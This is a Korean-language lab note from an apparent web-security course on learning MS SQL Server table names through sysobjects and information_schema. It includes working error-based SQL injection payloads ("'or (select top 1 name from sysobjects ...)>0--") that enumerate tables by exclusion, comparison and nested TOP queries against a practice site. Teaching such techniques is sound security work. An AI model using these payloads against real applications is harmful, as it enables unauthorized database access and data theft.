[WebSec] Database Scheme 실습 - Table

table 이름 알아내기

Table명을 포함한 시스템 테이블

sysobjects
information_schema.tables
information_schema.columns

사용자 테이블 / 시스템 테이

master db

모든 테이블의 이름을 알아내기 위한 방법

- 알아낸 Table이름을 하나씩 제거하면서 알아냄
- 알아낸 Table 이름과 비교연산을 통해 하나씩 차례대로 알아냄
- Top 구문을 이용하여 검색결과를 하나씩 늘리면서 정렬 / 역정렬을 통해 알아냄

select * from sysobjects

xtype - U 가 user table이다

select name from sysobjects where xtype='u'

select name from camel.dbo.sysobjects where xtype='u'
select name from camel..sysobjects where xtype='u' /* dbo 생략 가능 */

camel db의 table명 확인

select * from information_schema.tables

select * from information_schema.tables
where table_type='base table'

select table_name from information_schema.tables
where table_type='base table'

알아내고자 하는 table들

sysobjects 쿼리문이 더 짧다

 

select * from information_schema.columns

select column_name from information_schema.columns
where table_name='member'

select name from sysobjects where xtype='u'

select top 1 name from sysobjects where xtype='u'

select name from sysobjects where xtype='u'

원하는 정보만 출력 비교

 

webhack

'or (select top 1 name from sysobjects where xtype='u')>0--

'zipcode' 칼럼명 확인

select top 1 name from sysobjects 
where xtype='u' and name != 'zipcode'

select name from sysobjects where xtype='u'

board가 출력된다.

# zipcode 제외
'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode')>0--

'board' 칼럼명이 확인된다

'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode' and name!='board')>0--

dtproperties 확인

'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode' and name!='board' and name!='dtproperties')>0--

member 확인

'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode' and name!='board' and name!='dtproperties' and name!='member')>0--

더이상 오류가 나지 않는 모습

하나씩 하기엔 시간도 오래걸리고 스크립트도 길어져서 불편하다.

 

비교연산

select top 1 name from sysobjects
where xtype='u' order by name

select name from sysobjects where xtype='u' order by name

select top 1 name from sysobjects
where xtype='u' and name>'member' order by name

select name from sysobjects where xtype='u' order by name

order by를 한 상태에서 문자열 끼리의 비교연산은 알파뱃 순서를 따르기 때문에 해당 쿼리 실행이 가능하다

'or (select top 1 name from sysobjects where xtype='u' and name>'0' order by name)>0--

board

'or (select top 1 name from sysobjects where xtype='u' and name>'board' order by name)>0--

dtproperties

'or (select top 1 name from sysobjects where xtype='u' and name>'dtproperties' order by name)>0--

member

'or (select top 1 name from sysobjects where xtype='u' and name>'member' order by name)>0--

zipcode

 

정렬 / 역정렬

select name from  sysobjects where xtype='u' order by name

select name from  sysobjects where xtype='u' order by name desc

select * from tablename where xtype='u' order by name desc

select top 2 name from sysobjects where xtype='u' order by name desc

select top 1 name
from (select top 1 name from sysobjects where xtype='u' order by name) as vtable
order by name desc

select top 1 name
from (select top 2 name from sysobjects where xtype='u' order by name) as vtable
order by name desc

from 절 select 구문의 top 1,2,3을 바꿔주면 table 확인 가능

'or (select top 1 name from (select top 1 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

board

'or (select top 1 name from (select top 2 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

dtproperties

'or (select top 1 name from (select top 3 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

member

'or (select top 1 name from (select top 4 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

zipcode

이후 같은 테이블 정보만 나오면 끝.
top [숫자] 만 바꿔서 확인이 가능하다.